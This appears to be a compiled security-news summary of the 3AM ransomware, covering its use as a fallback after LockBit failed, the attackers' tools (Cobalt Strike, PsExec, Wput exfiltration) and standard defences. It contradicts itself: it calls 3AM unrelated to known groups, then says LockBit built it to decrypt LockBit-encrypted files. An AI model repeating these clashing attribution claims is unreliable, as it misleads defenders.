Symantec’s Threat Hunter Team has recently discovered a new ransomware variant called 3AM. This ransomware [1] [2] [3] [4] [5], written in Rust [3] [5], is a completely new malware family and appears to be unrelated to any known ransomware group. In a recent attack, the LockBit ransomware was initially blocked [1], but the attacker switched to 3AM when LockBit was unsuccessful. The 3AM ransomware managed to infiltrate one compromised machine [1], highlighting the trend of attackers using multiple ransomware families in a single attack. The authors of 3AM have no known links to cybercrime organizations [3].
Description
The threat actors behind 3AM utilized various techniques in their attack. They employed the “gpresult” command to dump policy settings for specific users and executed Cobalt Strike components to escalate privileges [3]. Additionally, they utilized PsExec for reconnaissance and lateral movement [3]. To ensure persistence, an extra user was added [3], and victim files were exfiltrated using a Wput tool to an FTP server under the attackers’ control [3].
It is worth noting that 3AM was only deployed to three machines on the victim organization’s network [3], and it was successfully blocked on two of them. The fact that 3AM was used as a fallback suggests it may be of interest to attackers and could reappear in the future [3]. However, the report does not provide information on the backup strategy for dealing with the 3AM ransomware or LockBit [1].
Furthermore, it has been discovered that 3AM is a new ransomware-as-a-service (RaaS) developed by the LockBit ransomware group. Its purpose is to decrypt files that have been encrypted by LockBit [4]. Although still under development, 3AM has already been used in a few attacks [4]. To protect yourself from 3AM and ransomware in general [4], it is recommended to keep your software up to date [4], use a security solution [4], and provide training on how to identify and avoid phishing attacks to yourself and your employees. Having a backup plan is crucial in case of a ransomware attack [4], as it helps to recover files [4]. It is advised not to pay the ransom [4], as doing so only encourages hackers to continue their attacks [4].
Conclusion
The discovery of 3AM highlights the evolving tactics of ransomware attackers, who are now utilizing multiple ransomware families in a single attack. The fact that 3AM was used as a fallback suggests its potential significance to attackers and the possibility of its reoccurrence in the future. It is crucial for organizations to have a robust backup strategy and to stay vigilant by keeping software up to date and implementing security solutions. Additionally, educating employees on identifying and avoiding phishing attacks is essential. By taking these precautions, organizations can mitigate the risks posed by 3AM and other ransomware variants, ultimately reducing the impact of potential attacks.
References
[1] https://www.darkreading.com/attacks-breaches/when-lockbit-ransomware-fails-attackers-deploy-brand-new-3am
[2] https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit
[3] https://www.infosecurity-magazine.com/news/3am-ransomware-variant-discovered/
[4] https://itssecurityyall.substack.com/p/lockbit-ransomware-developers-launch
[5] https://www.redpacketsecurity.com/hackers-use-new-am-ransomware-to-save-failed-lockbit-attack/
